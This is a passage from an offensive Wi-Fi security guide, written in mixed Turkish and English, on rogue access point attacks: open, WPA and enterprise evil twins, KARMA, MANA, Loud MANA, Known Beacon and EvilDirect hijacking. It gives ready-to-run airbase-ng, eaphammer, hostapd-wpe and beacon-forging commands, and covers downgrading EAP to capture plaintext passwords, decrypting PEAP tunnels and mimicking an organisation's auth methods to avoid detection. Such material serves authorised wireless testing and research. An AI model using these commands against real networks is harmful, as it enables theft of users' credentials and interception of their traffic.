• İstemci Gezintisi ve Bağlantı Manipülasyonu: 802.11 protokolü, aynı ESS içindeki access point'ler arasında cihazların dolaşmasına izin verir. Saldırganlar, bir cihazı mevcut base station'dan koparıp sahte bir access point'e bağlanmaya yönlendirmek için bundan yararlanabilir. Bu, daha güçlü bir sinyal sunarak veya deauthentication packets veya jamming gibi yöntemlerle meşru access point'e olan bağlantıyı bozarak gerçekleştirilebilir.
• Uygulamadaki Zorluklar: Birden fazla, iyi yerleştirilmiş access point'in bulunduğu ortamlarda bir evil twin attack'i başarıyla gerçekleştirmek zor olabilir. Tek bir meşru access point'i deauthenticate etmek genellikle cihazın başka bir meşru access point'e bağlanmasıyla sonuçlanır; saldırgan tüm yakındaki access point'leri deauthenticate edebilene veya sahte access point'i stratejik olarak yerleştirebilene kadar.

Çok temel bir Open Evil Twin (trafikleri Internet'e yönlendirme yeteneği olmayan) oluşturabilirsiniz:

airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon

Ayrıca eaphammer kullanarak bir Evil Twin oluşturabilirsiniz (eaphammer ile evil twins oluşturmak için interface'in monitor modunda olmaması gerektiğini unutmayın):

./eaphammer -i wlan0 --essid exampleCorp --captive-portal

Veya Airgeddon kullanarak: Options: 5,6,7,8,9 (inside Evil Twin attack menu).

Lütfen unutmayın ki varsayılan olarak, PNL'deki bir ESSID WPA korumalı olarak kaydedilmişse, cihaz otomatik olarak bir Open evil Twin'e bağlanmaz. Gerçek AP'yi DoS etmeyi deneyip kullanıcının Open evil Twin'inize elle bağlanmasını umabilirsiniz; veya gerçek AP'yi DoS edip bir WPA Evil Twin kullanarak handshake'i yakalayabilirsiniz (bu yöntemi kullanarak mağdurun size bağlanmasına izin veremezsiniz çünkü PSK'yı bilmiyorsunuz, ancak handshake'i yakalayıp kırmayı deneyebilirsiniz).

Some OS and AV will warn the user that connect to an Open network is dangerous...

WPA/WPA2 Evil Twin

Bir Evil Twin using WPA/2 oluşturabilirsiniz ve cihazlar o SSID'ye WPA/2 ile bağlanacak şekilde yapılandırıldıysa bağlanmayı deneyeceklerdir. Yine de, to complete the 4-way-handshake için istemcinin kullanacağı parolayı bilmeniz gerekir. Eğer bilmiyorsanız, bağlantı tamamlanmayacaktır.

./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"

Enterprise Evil Twin

Bu saldırıları anlamak için önce kısa WPA Enterprise explanation okumayı öneririm.

Using hostapd-wpe

hostapd-wpe çalışması için bir yapılandırma dosyasına ihtiyaç duyar. Bu yapılandırmaların oluşturulmasını otomatikleştirmek için https://github.com/WJDigby/apd_launchpad kullanılabilir (python dosyasını /etc/hostapd-wpe/ dizinine indirin)

./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s

Yapılandırma dosyasında ssid, channel, user files, cret/key, dh parameters, wpa version ve auth gibi birçok farklı şeyi seçebilirsiniz...

EAP-TLS ile hostapd-wpe kullanarak herhangi bir sertifikanın oturum açmasına izin verme.

EAPHammer kullanımı

# Generate Certificates
./eaphammer --cert-wizard

# Launch Attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

Varsayılan olarak, EAPHammer bu authentication methods'ı uygular (GTC'nin plaintext passwords elde etmeye çalışan ilk yöntem olduğunu ve ardından daha sağlam auth methods'ların kullanıldığını unutmayın):

GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5

Bu, uzun bağlantı sürelerinden kaçınmak için varsayılan yöntemdir. Ancak, kimlik doğrulama yöntemlerini en zayıftan en güçlüsüne olacak şekilde sunucuya da belirtebilirsiniz:

--negotiate weakest

Or you could also use:

• --negotiate gtc-downgrade to use highly efficient GTC downgrade implementation (plaintext passwords)
• --negotiate manual --phase-1-methods PEAP,TTLS --phase-2-methods MSCHAPV2,GTC,TTLS-PAP to specify manually the methods offered (offering the same auth methods in the same order as the organisation the attack will be much more difficult to detect).
• Find more info in the wiki

Using Airgeddon

Airgeddon can use previously generated certificated to offer EAP authentication to WPA/WPA2-Enterprise networks. The fake network will downgrade the connection protocol to EAP-MD5 so it will be able to capture the user and the MD5 of the password. Later, the attacker can try to crack the password.
Airggedon offers you the possibility of a continuous Evil Twin attack (noisy) or only create the Evil Attack until someone connects (smooth).

Debugging PEAP and EAP-TTLS TLS tunnels in Evil Twins attacks

This method was tested in an PEAP connection but as I'm decrypting an arbitrary TLS tunnel this should also works with EAP-TTLS

Inside the configuration of hostapd-wpe comment the line that contains dh_file (from dh_file=/etc/hostapd-wpe/certs/dh to #dh_file=/etc/hostapd-wpe/certs/dh)
This will make hostapd-wpe to exchange keys using RSA instead of DH, so you will be able to decrypt the traffic later knowing the servers private key.

Now start the Evil Twin using hostapd-wpe with that modified configuration as usual. Also, start wireshark in the interface which is performing the Evil Twin attack.

Now or later (when you have already captured some authentication intents) you can add the private RSA key to wireshark in: Edit --> Preferences --> Protocols --> TLS --> (RSA keys list) Edit...

Add a new entry and fill the form with this values: IP address = any -- Port = 0 -- Protocol = data -- Key File (select your key file, to avoid problems select a key file without being password protected).

And look at the new "Decrypted TLS" tab:

KARMA, MANA, Loud MANA and Known beacons attack

ESSID and MAC black/whitelists

Different types of Media Access Control Filter Lists (MFACLs) and their corresponding modes and effects on the behavior of a rogue Access Point (AP):

1. MAC-based Whitelist:

• The rogue AP will respond only to probe requests from devices specified in the whitelist, remaining invisible to all others not listed.

2. MAC-based Blacklist:

• The rogue AP will ignore probe requests from devices on the blacklist, effectively making the rogue AP invisible to those specific devices.

3. SSID-based Whitelist:

• The rogue AP will respond to probe requests only for specific ESSIDs listed, making it invisible to devices whose Preferred Network Lists (PNLs) do not contain those ESSIDs.

4. SSID-based Blacklist:

• The rogue AP will not respond to probe requests for the specific ESSIDs on the blacklist, making it invisible to devices seeking those particular networks.

# example EAPHammer MFACL file, wildcards can be used
09:6a:06:c8:36:af
37:ab:46:7a:9a:7c
c7:36:8c:b2:*:*

[--mac-whitelist /path/to/mac/whitelist/file.txt #EAPHammer whitelisting]
[--mac-blacklist /path/to/mac/blacklist/file.txt #EAPHammer blacklisting]

# example ESSID-based MFACL file
name1
name2
name3

[--ssid-whitelist /path/to/mac/whitelist/file.txt]
[--ssid-blacklist /path/to/mac/blacklist/file.txt]

KARMA

Bu yöntem, bir saldırganın ağa bağlanmaya çalışan cihazların tüm probe isteklerine yanıt veren kötü amaçlı access point (AP) oluşturmasına olanak tanır. Bu teknik, cihazların aradığı ağları taklit ederek cihazları saldırganın AP'sine bağlanmaya kandırır. Bir cihaz bu sahte AP'ye bağlantı isteği gönderdiğinde bağlantı tamamlanır ve cihaz yanlışlıkla saldırganın ağına bağlanır.

MANA

Daha sonra, cihazlar güvenilir olmayan ağ yanıtlarını görmezden gelmeye başlayarak orijinal karma saldırısının etkinliğini azalttı. Ancak Ian de Villiers ve Dominic White tarafından tanıtılan MANA attack adlı yeni bir yöntem ortaya çıktı. Bu yöntem, sahte AP'nin cihazların yayın (broadcast) probe isteklerine, cihazların daha önce kabul ettiği ağ adları (SSID'ler) ile yanıt vererek cihazlardan Preferred Network Lists (PNL) toplamasını içerir. Bu gelişmiş saldırı, cihazların tanıdık ağları hatırlama ve önceliklendirme biçimini istismar ederek orijinal karma saldırısına karşı korumaları atlatır.

MANA attack, cihazların hem yönlendirilmiş hem de broadcast probe isteklerini izleyerek çalışır. Yönlendirilmiş isteklerde cihazın MAC address'ini ve istenen ağ adını kaydeder ve bu bilgileri bir listeye ekler. Bir broadcast isteği alındığında, AP cihazın listesindeki herhangi bir ağla eşleşen bilgiyi yanıt olarak gönderir ve cihazı sahte AP'ye bağlanmaya teşvik eder.

./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]

Loud MANA

A Loud MANA attack, cihazların directed probing kullanmadığı veya saldırganın Preferred Network Lists (PNL) bilgisine sahip olmadığı durumlar için gelişmiş bir stratejidir. Bu yöntem, aynı alandaki cihazların PNL'lerinde bazı ağ isimlerini paylaşma olasılığının yüksek olduğu prensibine dayanır. Seçici yanıt vermek yerine, bu saldırı gözlemlenen tüm cihazların birleşik PNL'lerinde bulunan her ağ adı (ESSID) için probe responses yayınlar. Bu geniş kapsamlı yaklaşım, bir cihazın tanıdık bir ağı tanıma ve rogue Access Point (AP)'e bağlanmaya çalışması olasılığını artırır.

./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]

Known Beacon attack

When the Loud MANA attack may not suffice, the Known Beacon attack presents another approach. Bu yöntem, bir wordlist'ten türetilen potansiyel ESSID'ler listesini sırayla deneyerek herhangi bir ağ adına cevap veren bir AP'yi simüle edip bağlantı sürecini brute-forces eder. Bu, çok sayıda ağ varmış izlenimi yaratarak, hedefin PNL'inde bir ESSID ile eşleşmeyi umar ve sahte AP'ye bağlanma girişimini tetikler. Saldırı, cihazları yakalamaya yönelik daha agresif bir deneme için --loud seçeneği ile birleştirilerek güçlendirilebilir.

Eaphammer bu saldırıyı, bir listedeki tüm ESSID'lerin yayınlandığı bir MANA attack olarak uyguladı (bunu --loud ile birleştirerek Loud MANA + Known beacons attack oluşturabilirsiniz):

./eaphammer -i wlan0 --mana [--loud] --known-beacons  --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]

Known Beacon Burst attack

Known Beacon Burst attack, dosyada listelenen her ESSID için beacon frames'in hızlı ardışık yayınlanmasını içerir. Bu, sahte ağlardan oluşan yoğun bir ortam oluşturur ve cihazların rogue AP'ye bağlanma olasılığını büyük ölçüde artırır; özellikle bir MANA attack ile birleştirildiğinde. Bu teknik, hız ve hacim kullanarak cihazların ağ seçim mekanizmalarını bunaltır.

# transmit a burst of 5 forged beacon packets for each entry in list
./forge-beacons -i wlan1 \
--bssid de:ad:be:ef:13:37 \
--known-essids-file known-s.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5

Wi-Fi Direct

Wi-Fi Direct, geleneksel bir kablosuz erişim noktasına ihtiyaç duymadan cihazların Wi‑Fi üzerinden doğrudan birbirine bağlanmasını sağlayan bir protokoldür. Bu yetenek yazıcılar ve televizyonlar gibi çeşitli Internet of Things (IoT) cihazlarına entegre edilmiştir ve cihazlar arası doğrudan iletişimi kolaylaştırır. Wi‑Fi Direct'in dikkat çekici bir özelliği, bağlantıyı yönetmek için bir cihazın erişim noktası rolünü üstlenmesi; bu cihaz "group owner" olarak adlandırılır.

Wi‑Fi Direct bağlantılarının güvenliği, Wi‑Fi Protected Setup (WPS) aracılığıyla sağlanır; WPS, güvenli eşleştirme için aşağıdaki yöntemleri destekler:

• Push-Button Configuration (PBC)
• PIN entry
• Near-Field Communication (NFC)

Bu yöntemler, özellikle PIN entry, geleneksel Wi‑Fi ağlarındaki WPS ile aynı zafiyetlere açıktır ve benzer saldırı vektörlerinin hedefi olabilir.

EvilDirect Hijacking

EvilDirect Hijacking, Wi‑Fi Direct'e özgü bir saldırıdır. Evil Twin saldırısı konseptini yansıtır ancak hedefi Wi‑Fi Direct bağlantılarıdır. Bu senaryoda, bir saldırgan meşru bir group owner'ı taklit ederek cihazları kötü niyetli bir cihaza bağlanmaya kandırmayı amaçlar. Bu yöntem, taklit edilen cihazın kanalını, ESSID'sini ve MAC adresini belirterek airbase-ng gibi araçlarla uygulanabilir:

References

• https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
• https://posts.specterops.io/modern-wireless-attacks-pt-ii-mana-and-known-beacon-attacks-97a359d385f9
• https://posts.specterops.io/modern-wireless-tradecraft-pt-iii-management-frame-access-control-lists-mfacls-22ca7f314a38
• https://posts.specterops.io/modern-wireless-tradecraft-pt-iv-tradecraft-and-detection-d1a95da4bb4d
• https://github.com/gdssecurity/Whitepapers/blob/master/GDS%20Labs%20-%20Identifying%20Rogue%20Access%20Point%20Attacks%20Using%20Probe%20Response%20Patterns%20and%20Signal%20Strength.pdf
• http://solstice.sh/wireless/eaphammer/2019/09/10/eap-downgrade-attacks/
• https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/
• https://medium.com/hacking-info-sec/ataque-clientless-a-wpa-wpa2-usando-pmkid-1147d72f464d
• https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)
• https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/
• The vulnerability that killed FreeWifi_Secure
• RFC 4186 – EAP-SIM Authentication
• 3GPP TS 33.402 – 3GPP system architecture evolution (SAE); Security aspects of non-3GPP accesses

TODO: Take a look to https://github.com/wifiphisher/wifiphisher (Facebook ile giriş ve captive portals'ta WPA taklidi)